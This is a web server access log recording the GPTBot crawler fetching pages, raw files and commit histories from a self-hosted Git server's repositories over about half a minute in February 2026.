GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/index.tsx" +[17/Feb/2026:16:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 9773] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/index.tsx" +[17/Feb/2026:16:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/index.tsx" +[17/Feb/2026:16:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 820] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/index.tsx" +[17/Feb/2026:16:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 2437] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:16:19:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 74625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:16:19:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/pyvenv.cfg?display=rendered" [Client 74.7.227.38] [Length 10970] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:16:19:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog.service" [Client 74.7.227.38] [Length 12583] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" +[17/Feb/2026:16:19:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=closestduedate&state=closed" [Client 74.7.227.38] [Length 8506] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=closestduedate&state=open" +[17/Feb/2026:16:19:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10462] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:16:19:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10465] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:16:19:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/index.tsx" +[17/Feb/2026:16:19:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/index.tsx" +[17/Feb/2026:16:19:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/index.tsx" +[17/Feb/2026:16:19:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/index.tsx" +[17/Feb/2026:16:19:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" [Client 74.7.227.38] [Length 10297] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:19:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/status.json?display=source" [Client 74.7.227.38] [Length 11054] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/status.json" +[17/Feb/2026:16:19:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/status.json?display=source" [Client 74.7.227.38] [Length 11054] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/status.json" +[17/Feb/2026:16:19:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/status.json?display=source" [Client 74.7.227.38] [Length 11052] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/status.json" +[17/Feb/2026:16:19:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/status.json?display=source" [Client 74.7.227.38] [Length 11056] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/status.json" +[17/Feb/2026:16:19:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/watchdog.service" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog.service" +[17/Feb/2026:16:19:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/watchdog.service" +[17/Feb/2026:16:19:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/watchdog.service" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog.service" +[17/Feb/2026:16:19:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/watchdog.service" +[17/Feb/2026:16:19:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:19:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?q=&sort=furthestduedate&state=closed" [Client 74.7.227.38] [Length 8517] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?sort=closestduedate&state=closed" +[17/Feb/2026:16:19:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?q=&sort=closestduedate&state=closed" [Client 74.7.227.38] [Length 8515] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?sort=closestduedate&state=closed" +[17/Feb/2026:16:19:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?q=&sort=mostissues&state=closed" [Client 74.7.227.38] [Length 8521] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?sort=closestduedate&state=closed" +[17/Feb/2026:16:19:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 9989] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:16:19:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:16:19:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 11080] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:16:19:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 11088] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:16:19:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?q=&sort=leastissues&state=closed" [Client 74.7.227.38] [Length 8518] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?sort=closestduedate&state=closed" +[17/Feb/2026:16:19:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?q=&sort=leastcomplete&state=closed" [Client 74.7.227.38] [Length 8514] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?sort=closestduedate&state=closed" +[17/Feb/2026:16:19:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?q=&sort=mostcomplete&state=closed" [Client 74.7.227.38] [Length 8521] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?sort=closestduedate&state=closed" +[17/Feb/2026:16:19:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 9965] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:19:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/watchdog.service" [Client 74.7.227.38] [Length 9852] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog.service" +[17/Feb/2026:16:19:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/watchdog.service" [Client 74.7.227.38] [Length 11985] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog.service" +[17/Feb/2026:16:19:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/watchdog.service" [Client 74.7.227.38] [Length 783] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog.service" +[17/Feb/2026:16:20:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:20:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/watchdog.service" [Client 74.7.227.38] [Length 995] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog.service" +[17/Feb/2026:16:20:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 14451] [Gzip 11.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" +[17/Feb/2026:16:20:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 2064] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" +[17/Feb/2026:16:20:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 9993] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" +[17/Feb/2026:16:20:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 23048] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" +[17/Feb/2026:16:20:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 39470] [Gzip 31.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" +[17/Feb/2026:16:20:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11292] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:16:20:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 14533] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument" +[17/Feb/2026:16:20:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/watchdog.service" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/watchdog.service" +[17/Feb/2026:16:20:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/watchdog.service" +[17/Feb/2026:16:20:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/watchdog.service" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/watchdog.service" +[17/Feb/2026:16:20:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/watchdog.service" +[17/Feb/2026:16:20:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 12980] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument" +[17/Feb/2026:16:20:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/honeywell-logo.svg?display=rendered" [Client 74.7.227.38] [Length 11134] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:16:20:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates/index.html?display=source" [Client 74.7.227.38] [Length 15745] [Gzip 5.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates/index.html" +[17/Feb/2026:16:20:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/status.json?display=rendered" [Client 74.7.227.38] [Length 10893] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/status.json" +[17/Feb/2026:16:20:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/normalizer?display=rendered" [Client 74.7.227.38] [Length 11032] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:16:20:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/websockets?display=rendered" [Client 74.7.227.38] [Length 11032] [Gzip 3.02] [Sent-to 192.168.0.250] 